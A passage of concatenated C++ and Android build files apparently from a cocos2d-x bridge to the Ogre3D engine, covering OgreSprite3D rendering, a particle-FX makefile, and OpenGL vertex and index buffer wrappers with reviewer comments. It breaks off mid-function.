void _refreshVertexAttribPointer(RenderOperation &ro,cocos2d::GLProgramState **glProgramState,HardwareBuffer **vertextBuffer)
{
    *vertextBuffer = nullptr;
    const VertexDeclaration::VertexElementList& elements =
        ro.vertexData->vertexDeclaration->getElements();
    HardwareVertexBufferSharedPtr boundBuffer;
    GLint attribSize;
    GLenum attribType;
    GLboolean attribNormalized;
    for (VertexDeclaration::VertexElementList::const_iterator it = elements.begin();
         it != elements.end(); ++it)
    {
        if (!ro.vertexData->vertexBufferBinding->isBufferBound(it->getSource()))
            continue;
        boundBuffer = ro.vertexData->vertexBufferBinding->getBuffer(it->getSource());
        // Only one vertex buffer per renderable is supported by this bridge.
        if (nullptr != *vertextBuffer && *vertextBuffer != boundBuffer.get())
            cocos2d::log("ERROR: OgreOgreSprite3D cannot multiple vertexBuffer!");
        else
            *vertextBuffer = boundBuffer.get();
        refreshVertexAttribTypeByType(it->getType(), attribSize, attribType, attribNormalized);
        GLsizei stride = static_cast<GLsizei>(boundBuffer->getVertexSize());
        (*glProgramState)->setVertexAttribPointer(
            getVertexAttribNameBySemantic(it->getSemantic()),
            attribSize,
            attribType,
            attribNormalized,
            stride,
            (GLvoid*)((char *)NULL + (it->getOffset())));
    }
}
// Builds the attribute-presence bitmask for this render operation, fetches
// (or creates) the matching GL program state, then wires attribute pointers.
void _formatVertexBuffer(RenderOperation &ro,cocos2d::GLProgramState **glProgramState,HardwareBuffer **vertextBuffer)
{
    *vertextBuffer = nullptr;
    *glProgramState = nullptr;
    const VertexDeclaration::VertexElementList& elements =
        ro.vertexData->vertexDeclaration->getElements();
    int attribFlags = OGRE_VERTEX_ATTRIB_FLAG_NONE;
    for (VertexDeclaration::VertexElementList::const_iterator it = elements.begin();
         it != elements.end(); ++it)
    {
        if (ro.vertexData->vertexBufferBinding->isBufferBound(it->getSource()))
            attribFlags |= getVertexAttribFlagBySemantic(it->getSemantic());
    }
    // Pick the program matching the vertex layout, then bind the attributes.
    *glProgramState = getOrCreateWithVertexFlag(attribFlags);
    _refreshVertexAttribPointer(ro, glProgramState, vertextBuffer);
}
protected:
// Scratch array receiving Renderable::getWorldTransforms (up to 256 matrices).
Ogre::Matrix4 mMatrix4[256];
// Reused render-operation snapshot, refilled per visited renderable.
Ogre::RenderOperation mOperation;
// Per-renderable cached GL state; owned by the OgreSprite3D being visited.
MeshStateMap *_tempStateMap;
Ogre::SceneManager *mSceneManager;
Ogre::RenderSystem *mRenderSystem;
};
}
static Ogre::QueueVisitor *s_QueueVisitor = NULL;
NS_CC_BEGIN
// File-scope GL buffer handles and interleaved vertex layout for the debug
// quad; only referenced from the commented-out test path in OgreSprite3D::init().
GLuint vertexBuffer;
GLuint indexBuffer;
typedef struct {
GLfloat cPosition[3];
GLfloat cColor[4];
GLfloat cTexCoord[2];
} Vertex;
/**
 * Factory following the cocos2d create/autorelease convention: returns an
 * autoreleased, initialized sprite, or nullptr if initialization fails.
 */
OgreSprite3D* OgreSprite3D::create()
{
    OgreSprite3D *sprite = new OgreSprite3D();
    if (sprite != nullptr && sprite->init())
    {
        sprite->autorelease();
        return sprite;
    }
    CC_SAFE_DELETE(sprite);
    return nullptr;
}
/**
 * Factory variant that loads an Ogre entity from @p filePath and attaches it
 * to the sprite's scene node; returns nullptr on failure.
 */
OgreSprite3D* OgreSprite3D::create(const std::string &filePath)
{
    OgreSprite3D *sprite = new OgreSprite3D();
    if (sprite != nullptr && sprite->initWithFile(filePath))
    {
        sprite->autorelease();
        return sprite;
    }
    CC_SAFE_DELETE(sprite);
    return nullptr;
}
// Constructor: every sprite owns a detached Ogre scene node; movable objects
// are attached later via attachObject()/initWithFile().
// BUGFIX: _texture was previously left uninitialized (it is only ever
// assigned inside the commented-out debug path of init()), so reading it was
// undefined behavior; initialize it to nullptr.
OgreSprite3D::OgreSprite3D() :
_blend(cocos2d::BlendFunc::ALPHA_NON_PREMULTIPLIED),
_texture(nullptr)
{
_nodeProtocol = OgreManager::getInstance()->getSceneManager()->createSceneNode();
}
// Destructor: releases the wrapped scene node.
// NOTE(review): _nodeProtocol was obtained from SceneManager::createSceneNode();
// deleting it directly (rather than via the manager's destroy API) bypasses
// any bookkeeping the manager may keep -- confirm the manager does not also
// track this node.
OgreSprite3D::~OgreSprite3D()
{
CC_SAFE_DELETE(_nodeProtocol);
}
/**
 * Lazily creates the shared render-queue visitor on first use (it must not
 * be constructed before Ogre's Root/SceneManager exist) and then performs
 * base-node initialization.  The visitor is shared by all OgreSprite3D
 * instances and intentionally never freed.
 */
bool OgreSprite3D::init()
{
    if (NULL == s_QueueVisitor)
    {
        s_QueueVisitor = new Ogre::QueueVisitor();
        s_QueueVisitor->setSceneManager(OgreManager::getInstance()->getSceneManager());
        s_QueueVisitor->setRenderSystem(OgreManager::getInstance()->getRenderSystem());
    }
    return CCNode::init();
}
bool OgreSprite3D::initWithFile( const std::string &filePath)
{
auto entry = OgreManager::getInstance()->createEntity(filePath);
if (entry && OgreSprite3D::init())
{
this->attachObject(entry);
return true;
}
return false;
}
// Attaches an Ogre movable (entity, particle system, ...) to the wrapped
// scene node; silently does nothing when the node is absent.
void OgreSprite3D::attachObject(Ogre::MovableObject *movable)
{
    if (_nodeProtocol == nullptr)
        return;
    _nodeProtocol->attachObject(movable);
}
// Detaches a single movable from the wrapped scene node (no-op without one).
void OgreSprite3D::detachObject(Ogre::MovableObject *movable)
{
    if (_nodeProtocol == nullptr)
        return;
    _nodeProtocol->detachObject(movable);
}
// Detaches every movable from the wrapped scene node (no-op without one).
void OgreSprite3D::detachAllObjects()
{
    if (_nodeProtocol == nullptr)
        return;
    _nodeProtocol->detachAllObjects();
}
// Mirrors this node's cocos2d world transform onto the wrapped Ogre scene
// node by decomposing it into scale / rotation / translation.
void OgreSprite3D::updateParentTransform(const Mat4& parentTransform)
{
_modelViewTransform = this->transform(parentTransform);
if (_nodeProtocol)
{
// Mat4::decompose fills the cached scale/rotation/translation members.
_modelViewTransform.decompose(&mCosScale, &mCosRotation, &mCosTranslation);
_nodeProtocol->setScale(Ogre::Vector3(mCosScale.x,mCosScale.y,mCosScale.z));
_nodeProtocol->setPosition(Ogre::Vector3(mCosTranslation.x,mCosTranslation.y,mCosTranslation.z));
// Ogre::Quaternion's constructor takes w first; cocos2d stores x,y,z,w.
_nodeProtocol->setOrientation(Ogre::Quaternion(mCosRotation.w,mCosRotation.x,mCosRotation.y,mCosRotation.z));
_nodeProtocol->needUpdate();
}
}
/**
 * Resolves normalized positioning against the parent's content size,
 * accumulates this node's dirty flags on top of the parent's, and refreshes
 * the cached transform when anything is dirty.  Returns the combined flags.
 */
uint32_t OgreSprite3D::processParentFlags(const Mat4& parentTransform, uint32_t parentFlags)
{
    if (_usingNormalizedPosition) {
        CCASSERT(_parent, "setNormalizedPosition() doesn't work with orphan nodes");
        const bool parentResized = (parentFlags & FLAGS_CONTENT_SIZE_DIRTY) != 0;
        if (parentResized || _normalizedPositionDirty) {
            const auto parentSize = _parent->getContentSize();
            _position.x = _normalizedPosition.x * parentSize.width;
            _position.y = _normalizedPosition.y * parentSize.height;
            _transformUpdated = _transformDirty = _inverseDirty = true;
            _normalizedPositionDirty = false;
        }
    }

    uint32_t flags = parentFlags;
    if (_transformUpdated)
        flags |= FLAGS_TRANSFORM_DIRTY;
    if (_contentSizeDirty)
        flags |= FLAGS_CONTENT_SIZE_DIRTY;

    if (flags & FLAGS_DIRTY_MASK)
        updateParentTransform(parentTransform);

    _transformUpdated = false;
    _contentSizeDirty = false;
    return flags;
}
// cocos2d visit override.  Computes dirty flags and the model-view transform,
// then draws.  Unlike Node::visit this never recurses into cocos2d children,
// so OgreSprite3D behaves as a leaf in the cocos2d scene graph.
void OgreSprite3D::visit(cocos2d::Renderer *renderer, const cocos2d::Mat4& parentTransform, uint32_t parentFlags)
{
// quick return if not visible. children won't be drawn.
if (!_visible)
{
return;
}
uint32_t flags = processParentFlags(parentTransform, parentFlags);
// IMPORTANT:
// To ease the migration to v3.0, we still support the Mat4 stack,
// but it is deprecated and your code should not rely on it
Director* director = Director::getInstance();
director->pushMatrix(MATRIX_STACK_TYPE::MATRIX_STACK_MODELVIEW);
director->loadMatrix(MATRIX_STACK_TYPE::MATRIX_STACK_MODELVIEW, _modelViewTransform);
bool visibleByCamera = isVisitableByVisitingCamera();
if (visibleByCamera)
{
this->draw(renderer, _modelViewTransform, flags);
}
director->popMatrix(MATRIX_STACK_TYPE::MATRIX_STACK_MODELVIEW);
// FIX ME: Why need to set _orderOfArrival to 0??
// Please refer to https://github.com/cocos2d/cocos2d-x/pull/6920
// reset for next frame
// _orderOfArrival = 0;
}
// Emits one cocos2d MeshCommand per visible mesh state.  The shared
// QueueVisitor walks the Ogre scene node first and refreshes _meshStateMap;
// every state marked _visible this frame is turned into a command, and the
// flag is cleared so stale entries are skipped next frame.
void OgreSprite3D::draw(cocos2d::Renderer *renderer, const cocos2d::Mat4 &transform, uint32_t flags)
{
if(_nodeProtocol)
{
//glClearColor(1.0f,1.0f,0.0f,1.0f);
s_QueueVisitor->visitor(_nodeProtocol,&_meshStateMap);
// NOTE(review): 'color' is computed from the displayed colour/opacity but
// never used below (setDisplayColorEnabled(false)) -- confirm whether it
// was meant to feed the mesh commands.
Color4F color(getDisplayedColor());
color.a = getDisplayedOpacity() / 255.0f;
/*_customCommand.init(_globalZOrder);
_customCommand.func = CC_CALLBACK_0(OgreSprite3D::onDraw, this, transform, flags);
renderer->addCommand(&_customCommand);
return ;*/
MeshStateMap::iterator elem ,end = _meshStateMap.end();
for( elem = _meshStateMap.begin(); elem != end; ++ elem)
{
Ogre::RenderState &state = elem->second;
if(state._visible)
{
// Consume the visibility flag set by QueueVisitor::_render this frame.
state._visible = false;
MeshCommand &meshCommand = state.meshCommand;
//state.blend.src = GL_SRC_ALPHA;
//state.blend.dst.m = GL_ONE_MINUS_DST_ALPHA;
meshCommand.init(_globalZOrder,state.textureId,state.glProgramState,state.blend,state.vertexBufferId,state.indexBufferId,state.operationType,state.indexBufferType,state.indexCount,state.mat4);
//meshCommand.setDepthTestEnabled(true);
//meshCommand.setTransparent(true);
//meshCommand.setDepthWriteEnabled(false);
meshCommand.setTransparent(state.isTransparent);
meshCommand.setDepthTestEnabled(state.isDepthTestEnabled);
meshCommand.setDepthWriteEnabled(state.isDepthWriteEnabled);
meshCommand.setDisplayColorEnabled(false);
meshCommand.genMaterialID(state.textureId, state.glProgramState, state.vertexBufferId, state.indexBufferId, state.blend);
renderer->addCommand(&meshCommand);
}
}
}
}
//we call our actual opengl commands here
// Legacy immediate-mode draw path, only reachable through the CustomCommand
// that is currently commented out in draw().
// NOTE(review): the index type is hard-coded to GL_UNSIGNED_BYTE even though
// state.indexBufferType is captured by the visitor; 16/32-bit index buffers
// would render garbage through this path -- fix before re-enabling it.
void OgreSprite3D::onDraw(const cocos2d::Mat4 &transform, uint32_t flags)
{
MeshStateMap::iterator elem ,end = _meshStateMap.end();
for( elem = _meshStateMap.begin(); elem != end; ++ elem)
{
Ogre::RenderState &state = elem->second;
auto s_shader = getGLProgram();
s_shader->use();
s_shader->setUniformsForBuiltins(transform);
GL::bindTexture2D(state.textureId);
glBindBuffer(GL_ARRAY_BUFFER,state.vertexBufferId);
state.glProgramState->applyAttributes();
/*glVertexAttribPointer(kCCVertexAttrib_Position, 3, GL_FLOAT, GL_FALSE, sizeof(Vertex),
(GLvoid*)offsetof(Vertex, cPosition));
glVertexAttribPointer(kCCVertexAttrib_TexCoords, 2, GL_FLOAT, GL_FALSE, sizeof(Vertex),
(GLvoid*)offsetof(Vertex, cTexCoord));
glVertexAttribPointer(kCCVertexAttrib_Color, 4, GL_FLOAT, GL_FALSE, sizeof(Vertex),
(GLvoid*)offsetof(Vertex, cColor));*/
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER,state.indexBufferId);
glDrawElements(state.operationType,state.indexCount,GL_UNSIGNED_BYTE, 0);
CHECK_GL_ERROR_DEBUG();
glBindBuffer(GL_ARRAY_BUFFER, 0);
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, 0);
}
}
// BlendProtocol: caches the blend function, storing it only when it actually
// differs from the current value.
void OgreSprite3D::setBlendFunc(const cocos2d::BlendFunc &blendFunc)
{
    const bool changed =
        (_blend.src != blendFunc.src) || (_blend.dst != blendFunc.dst);
    if (changed)
        _blend = blendFunc;
}
// BlendProtocol accessor: returns the blend function cached by setBlendFunc().
// NOTE(review): this cached value is not applied during draw(); the per-pass
// blend factors captured in RenderState are used instead -- confirm intended.
const cocos2d::BlendFunc& OgreSprite3D::getBlendFunc() const
{
return _blend;
}
NS_CC_END<file_sep>LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)

LOCAL_MODULE := particlefx_static
LOCAL_MODULE_FILENAME := libogreparticlefx

LOCAL_LDLIBS := -lGLESv2 \
                -llog \
                -lz \
                -landroid
LOCAL_EXPORT_LDLIBS := -lGLESv2 \
                       -llog \
                       -lz \
                       -landroid

LOCAL_CFLAGS := -fexceptions -DUSE_FILE32API
LOCAL_CPPFLAGS := -fexceptions -Wno-deprecated-declarations
LOCAL_EXPORT_CFLAGS := -lstdc++ -fexceptions
LOCAL_EXPORT_CPPFLAGS := -lstdc++ -fexceptions

# ogre_particlefx
LOCAL_OGRE_PARTICLE_FX_INCLUDE := \
    $(LOCAL_PATH)/include

LOCAL_OGRE_PARTICLE_FX_SRC_FILES := \
    src/OgreAreaEmitter.cpp \
    src/OgreBoxEmitter.cpp \
    src/OgreColourFaderAffector2.cpp \
    src/OgreColourFaderAffector.cpp \
    src/OgreColourImageAffector.cpp \
    src/OgreColourInterpolatorAffector.cpp \
    src/OgreCylinderEmitter.cpp \
    src/OgreDeflectorPlaneAffector.cpp \
    src/OgreDirectionRandomiserAffector.cpp \
    src/OgreEllipsoidEmitter.cpp \
    src/OgreHollowEllipsoidEmitter.cpp \
    src/OgreLinearForceAffector.cpp \
    src/OgreParticleFX.cpp \
    src/OgreParticleFXPlugin.cpp \
    src/OgrePointEmitter.cpp \
    src/OgreRingEmitter.cpp \
    src/OgreRotationAffector.cpp \
    src/OgreScaleAffector.cpp

# BUGFIX: the freetype2 line previously ended with a trailing backslash,
# which folded the following "+=" statement into the value of this variable.
LOCAL_EXPORT_C_INCLUDES := \
    $(LOCAL_PATH)/../../../cocos \
    $(LOCAL_PATH)/../../../cocos/platform/android \
    $(LOCAL_PATH)/../../../external/freetype2/include/android
LOCAL_EXPORT_C_INCLUDES += $(LOCAL_PATH)/include
LOCAL_EXPORT_C_INCLUDES += $(LOCAL_PATH)/../include

LOCAL_C_INCLUDES := $(LOCAL_PATH)/../include
LOCAL_C_INCLUDES += $(LOCAL_OGRE_PARTICLE_FX_INCLUDE)

# BUGFIX: "LOCAL_SRC_FILES := \" previously continued onto the "+=" line, so
# the literal text "LOCAL_SRC_FILES += ..." became the value and no sources
# were actually listed for compilation.
LOCAL_SRC_FILES := $(LOCAL_OGRE_PARTICLE_FX_SRC_FILES)

LOCAL_WHOLE_STATIC_LIBRARIES := ogremain_static

include $(BUILD_STATIC_LIBRARY)
$(call import-module,../third_party/ogre/ogre_main)<file_sep>/****************************************************************************
Copyright (c) 2014 Chukong Technologies Inc.
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#ifndef __CCOgreSprite3D_H__
#define __CCOgreSprite3D_H__
#include "cocos2d.h"
#include "OgreNodeProtocol.h"
namespace Ogre
{
class SceneNode;
class MovableObject;
}
NS_CC_BEGIN
class NodeProtocol;
/** Ogre 3D sprite: a cocos2d node that wraps an Ogre scene node. */
class OgreSprite3D :
public cocos2d::Node,
public cocos2d::BlendProtocol
{
public:
// Factories following the cocos2d create/autorelease convention; the
// filePath overload loads an Ogre entity and attaches it to the node.
static OgreSprite3D* create();
static OgreSprite3D* create(const std::string &filePath);
// BlendProtocol: the blend function is cached; draw() applies per-pass state.
virtual void setBlendFunc(const cocos2d::BlendFunc &blendFunc) override;
virtual const cocos2d::BlendFunc &getBlendFunc() const override;
CC_CONSTRUCTOR_ACCESS:
OgreSprite3D();
virtual ~OgreSprite3D();
virtual bool init();
virtual bool initWithFile( const std::string &filePath);
// Attach/detach Ogre movables to/from the wrapped scene node.
virtual void detachAllObjects();
virtual void detachObject(Ogre::MovableObject *movable);
virtual void attachObject(Ogre::MovableObject *movable);
// Mirrors the cocos2d transform onto the Ogre scene node.
virtual void updateParentTransform(const Mat4& parentTransform);
uint32_t processParentFlags(const Mat4& parentTransform, uint32_t parentFlags);
virtual void visit(cocos2d::Renderer *renderer, const cocos2d::Mat4& parentTransform, uint32_t parentFlags) override;
virtual void draw(cocos2d::Renderer *renderer, const cocos2d::Mat4 &transform, uint32_t flags) override;
// Legacy immediate-mode path used only via the (disabled) custom command.
void onDraw(const cocos2d::Mat4 &transform, uint32_t flags);
protected:
cocos2d::BlendFunc _blend;
// Per-renderable GL state cache, refreshed each frame by the queue visitor.
MeshStateMap _meshStateMap;
// Wrapped Ogre scene node, created in the constructor.
Ogre::SceneNode *_nodeProtocol;
// Decomposition scratch used by updateParentTransform().
cocos2d::Quaternion mCosRotation;
cocos2d::Vec3 mCosScale, mCosTranslation;
cocos2d::CustomCommand _customCommand;
cocos2d::Texture2D *_texture;
};
NS_CC_END
#endif // __CCOgreSprite3D_H__
<file_sep>
#include "OgreStableHeaders.h"
#include "OgreBridgeBufferManager.h"
#include "renderer/CCVertexIndexBuffer.h"
#include "base/CCEventType.h"
#include "base/CCEventListenerCustom.h"
#include "base/CCEventDispatcher.h"
#include "base/CCDirector.h"
namespace Ogre {
// Maps an Ogre HardwareBuffer usage flag onto the matching GL buffer usage
// hint; unknown flags fall back to GL_DYNAMIC_DRAW.
inline GLenum getGLUsageByHardwareUsage(unsigned int usage)
{
    GLenum glUsage = GL_DYNAMIC_DRAW;
    switch (usage)
    {
    case HardwareBuffer::HBU_STATIC:
    case HardwareBuffer::HBU_STATIC_WRITE_ONLY:
        glUsage = GL_STATIC_DRAW;
        break;
    case HardwareBuffer::HBU_DYNAMIC:
    case HardwareBuffer::HBU_DYNAMIC_WRITE_ONLY:
        glUsage = GL_DYNAMIC_DRAW;
        break;
    case HardwareBuffer::HBU_DYNAMIC_WRITE_ONLY_DISCARDABLE:
        glUsage = GL_STREAM_DRAW;
        break;
    default:
        break;
    }
    return glUsage;
}
// Maps an Ogre vertex-element type onto the GL component type used with
// glVertexAttribPointer; unrecognised types yield 0.
inline GLenum getGLTypeByHardwareType(unsigned int type)
{
    GLenum glType = 0;
    switch (type)
    {
    case VET_FLOAT1:
    case VET_FLOAT2:
    case VET_FLOAT3:
    case VET_FLOAT4:
        glType = GL_FLOAT;
        break;
    case VET_SHORT1:
    case VET_SHORT2:
    case VET_SHORT3:
    case VET_SHORT4:
        glType = GL_SHORT;
        break;
    case VET_COLOUR:
    case VET_COLOUR_ABGR:
    case VET_COLOUR_ARGB:
    case VET_UBYTE4:
        glType = GL_UNSIGNED_BYTE;
        break;
    default:
        break;
    }
    return glType;
}
// Creates the GL VBO up front; actual data is uploaded later via writeData().
// NOTE(review): the initial glBufferData always passes GL_STATIC_DRAW rather
// than getGLUsageByHardwareUsage(usage); subsequent writeData calls
// re-specify the buffer with the proper hint, so this only affects the first
// allocation -- confirm intended.
BridgeHardwareVertexBuffer::BridgeHardwareVertexBuffer(HardwareBufferManagerBase* mgr,
size_t vertexSize,
size_t numVertices,
HardwareBuffer::Usage usage,
bool useShadowBuffer)
: HardwareVertexBuffer(mgr, vertexSize, numVertices, usage, false, useShadowBuffer)
{
glGenBuffers(1, &_vbo);
glBindBuffer(GL_ARRAY_BUFFER, _vbo);
CHECK_GL_ERROR_DEBUG();
glBufferData(GL_ARRAY_BUFFER, mSizeInBytes, nullptr, GL_STATIC_DRAW);
CHECK_GL_ERROR_DEBUG();
glBindBuffer(GL_ARRAY_BUFFER, 0);
#if (CC_TARGET_PLATFORM == CC_PLATFORM_ANDROID)
// The Android GL context can be destroyed; when the renderer is recreated,
// repopulate the VBO from the CPU-side shadow copy.
auto callBack = [this](cocos2d::EventCustom* event)
{
this->mShadowUpdated = true;
this->_updateFromShadow();
};
_recreateVBOEventListener = cocos2d::Director::getInstance()->getEventDispatcher()->addCustomEventListener(EVENT_RENDERER_RECREATED, callBack);
#endif
}
// Releases the GL buffer object (only if the GL context still considers it a
// live buffer) and, on Android, unregisters the context-recreation listener.
BridgeHardwareVertexBuffer::~BridgeHardwareVertexBuffer()
{
if(glIsBuffer(_vbo))
{
glDeleteBuffers(1, &_vbo);
_vbo = 0;
}
#if (CC_TARGET_PLATFORM == CC_PLATFORM_ANDROID)
cocos2d::Director::getInstance()->getEventDispatcher()->removeEventListener(_recreateVBOEventListener);
#endif
}
// Locks a region of the buffer by handing out a chunk of the manager's CPU
// scratch pool.  Direct GL buffer mapping is not implemented: regions at or
// above the manager's map threshold (or when the scratch pool is exhausted,
// which returns a null pointer here) raise an exception / return NULL.
void* BridgeHardwareVertexBuffer::lockImpl(size_t offset,
size_t length,
LockOptions options)
{
if (mIsLocked)
{
OGRE_EXCEPT(Exception::ERR_INTERNAL_ERROR,
"Invalid attempt to lock an index buffer that has already been locked",
"BridgeHardwareVertexBuffer::lock");
}
void* retPtr = 0;
BridgeHardwareBufferManager* glBufManager = static_cast<BridgeHardwareBufferManager*>(HardwareBufferManager::getSingletonPtr());
// Try to use scratch buffers for smaller buffers
if (length < glBufManager->getGLMapBufferThreshold())
{
// if this fails, we fall back on mapping
retPtr = glBufManager->allocateScratch((uint32)length);
if (retPtr)
{
mLockedToScratch = true;
mScratchOffset = offset;
mScratchSize = length;
mScratchPtr = retPtr;
// Anything but a read-only lock must be flushed back on unlock.
mScratchUploadOnUnlock = (options != HBL_READ_ONLY);
if (options != HBL_DISCARD)
{
// have to read back the data before returning the pointer
readData(offset, length, retPtr);
}
}
}
else
{
OGRE_EXCEPT(Exception::ERR_INTERNAL_ERROR,
"Invalid Buffer lockSize",
"BridgeHardwareVertexBuffer::lock");
}
mIsLocked = true;
return retPtr;
}
// Ends a scratch lock: flushes the scratch contents back into the VBO when
// the lock was writable, then returns the scratch chunk to the pool.  Any
// other lock mode is unsupported and raises.
void BridgeHardwareVertexBuffer::unlockImpl(void)
{
    if (!mLockedToScratch)
    {
        OGRE_EXCEPT(Exception::ERR_INTERNAL_ERROR,
            "Only locking to scratch is supported",
            "BridgeHardwareVertexBuffer::unlockImpl");
    }

    if (mScratchUploadOnUnlock)
    {
        // A full-range lock may discard (re-specify) the whole buffer.
        writeData(mScratchOffset, mScratchSize, mScratchPtr,
                  mScratchOffset == 0 && mScratchSize == getSizeInBytes());
    }
    static_cast<BridgeHardwareBufferManager*>(
        HardwareBufferManager::getSingletonPtr())->deallocateScratch(mScratchPtr);
    mLockedToScratch = false;
    mIsLocked = false;
}
// Reads a region of the buffer.  Only possible through the CPU-side shadow
// copy -- there is no GL read-back path in this bridge.
void BridgeHardwareVertexBuffer::readData(size_t offset, size_t length, void* pDest)
{
    if (!mUseShadowBuffer)
    {
        OGRE_EXCEPT(Exception::ERR_INTERNAL_ERROR,
            "Read hardware buffer is not supported",
            "BridgeHardwareVertexBuffer::readData");
    }
    void* shadowData = mShadowBuffer->lock(offset, length, HBL_READ_ONLY);
    memcpy(pDest, shadowData, length);
    mShadowBuffer->unlock();
}
// Writes a region into both the CPU shadow copy (when present) and the GL
// VBO.  A full-range write re-specifies the whole buffer with glBufferData;
// a partial write with discardWholeBuffer first orphans the old storage so
// the driver need not synchronise with in-flight draws.
void BridgeHardwareVertexBuffer::writeData(size_t offset,
size_t length,
const void* pSource,
bool discardWholeBuffer)
{
// Update the shadow buffer
if (mUseShadowBuffer)
{
void* destData = mShadowBuffer->lock(offset, length,
discardWholeBuffer ? HBL_DISCARD : HBL_NORMAL);
memcpy(destData, pSource, length);
mShadowBuffer->unlock();
}
glBindBuffer(GL_ARRAY_BUFFER, _vbo);
CHECK_GL_ERROR_DEBUG();
if (offset == 0 && length == mSizeInBytes)
{
glBufferData(GL_ARRAY_BUFFER, mSizeInBytes, pSource,
getGLUsageByHardwareUsage(mUsage));
CHECK_GL_ERROR_DEBUG();
}
else
{
if(discardWholeBuffer)
{
// Orphan the old storage before the partial upload.
glBufferData(GL_ARRAY_BUFFER, mSizeInBytes, NULL,
getGLUsageByHardwareUsage(mUsage));
CHECK_GL_ERROR_DEBUG();
}
glBufferSubData(GL_ARRAY_BUFFER, offset, length, pSource);
CHECK_GL_ERROR_DEBUG();
}
glBindBuffer(GL_ARRAY_BUFFER, 0);
}
// Re-uploads the shadow copy into the GL VBO (used after the Android GL
// context is recreated).  Skips the upload unless there is pending shadow
// data and hardware updates are not suppressed.
void BridgeHardwareVertexBuffer::_updateFromShadow(void)
{
    if (!mUseShadowBuffer || !mShadowUpdated || mSuppressHardwareUpdate)
        return;

    const void *shadowData = mShadowBuffer->lock(mLockStart, mLockSize, HBL_READ_ONLY);
    glBindBuffer(GL_ARRAY_BUFFER, _vbo);
    CHECK_GL_ERROR_DEBUG();
    glBufferData(GL_ARRAY_BUFFER, (GLsizeiptr)mSizeInBytes, shadowData,
                 getGLUsageByHardwareUsage(mUsage));
    CHECK_GL_ERROR_DEBUG();
    glBindBuffer(GL_ARRAY_BUFFER, 0);
    mShadowBuffer->unlock();
    mShadowUpdated = false;
}
// Creates the GL buffer for index data; contents are uploaded via writeData().
// NOTE(review): uploads use the GL_ARRAY_BUFFER target even though this is an
// index buffer.  GL buffer objects are untyped so this works, and it avoids
// disturbing any bound VAO's element-array binding -- presumably intentional
// (mirrors the vertex-buffer class); confirm.
BridgeHardwareIndexBuffer::BridgeHardwareIndexBuffer(HardwareBufferManagerBase* mgr,
IndexType idxType,
size_t numIndexes,
HardwareBuffer::Usage usage,
bool useShadowBuffer)
: HardwareIndexBuffer(mgr, idxType, numIndexes, usage, false, useShadowBuffer)
{
glGenBuffers(1, &_vbo);
glBindBuffer(GL_ARRAY_BUFFER, _vbo);
glBufferData(GL_ARRAY_BUFFER, mSizeInBytes, nullptr, GL_STATIC_DRAW);
glBindBuffer(GL_ARRAY_BUFFER, 0);
#if (CC_TARGET_PLATFORM == CC_PLATFORM_ANDROID)
// Repopulate the buffer from the shadow copy after GL context recreation.
auto callBack = [this](cocos2d::EventCustom* event)
{
this->mShadowUpdated = true;
this->_updateFromShadow();
};
_recreateVBOEventListener = cocos2d::Director::getInstance()->getEventDispatcher()->addCustomEventListener(EVENT_RENDERER_RECREATED, callBack);
#endif
}
// Releases the GL buffer object (if still alive in the current context) and,
// on Android, unregisters the context-recreation listener.
BridgeHardwareIndexBuffer::~BridgeHardwareIndexBuffer()
{
if(glIsBuffer(_vbo))
{
glDeleteBuffers(1, &_vbo);
_vbo = 0;
}
#if (CC_TARGET_PLATFORM == CC_PLATFORM_ANDROID)
cocos2d::Director::getInstance()->getEventDispatcher()->removeEventListener(_recreateVBOEventListener);
#endif
}
// Ends a scratch lock on the index buffer: flushes writable locks back to
// the GL buffer, then frees the scratch chunk.  Non-scratch locks raise.
void BridgeHardwareIndexBuffer::unlockImpl(void)
{
    if (!mLockedToScratch)
    {
        OGRE_EXCEPT(Exception::ERR_INTERNAL_ERROR,
            "Lock to scratch is only supported",
            "BridgeHardwareIndexBuffer::unlockImpl");
    }

    if (mScratchUploadOnUnlock)
    {
        // A full-range lock may discard (re-specify) the whole buffer.
        writeData(mScratchOffset, mScratchSize, mScratchPtr,
                  mScratchOffset == 0 && mScratchSize == getSizeInBytes());
    }
    static_cast<BridgeHardwareBufferManager*>(
        HardwareBufferManager::getSingletonPtr())->deallocateScratch(mScratchPtr);
    mLockedToScratch = false;
    mIsLocked = false;
}
// Locks a region of the index buffer via the manager's CPU scratch pool;
// mirrors BridgeHardwareVertexBuffer::lockImpl.  Regions at or above the map
// threshold raise; a depleted scratch pool yields a NULL return.
void* BridgeHardwareIndexBuffer::lockImpl(size_t offset,
size_t length,
LockOptions options)
{
if(mIsLocked)
{
OGRE_EXCEPT(Exception::ERR_INTERNAL_ERROR,
"Invalid attempt to lock an index buffer that has already been locked",
"BridgeHardwareIndexBuffer::lock");
}
void* retPtr = 0;
BridgeHardwareBufferManager* glBufManager = static_cast<BridgeHardwareBufferManager*>(HardwareBufferManager::getSingletonPtr());
if(length < glBufManager->getGLMapBufferThreshold())
{
retPtr = glBufManager->allocateScratch((uint32)length);
if (retPtr)
{
mLockedToScratch = true;
mScratchOffset = offset;
mScratchSize = length;
mScratchPtr = retPtr;
// Writable locks must be flushed back to the GL buffer on unlock.
mScratchUploadOnUnlock = (options != HBL_READ_ONLY);
if (options != HBL_DISCARD)
{
// Preload current contents so the caller can read/modify them.
readData(offset, length, retPtr);
}
}
}
else
{
OGRE_EXCEPT(Exception::ERR_INTERNAL_ERROR,
"Invalid Buffer lockSize",
"BridgeHardwareIndexBuffer::lock");
}
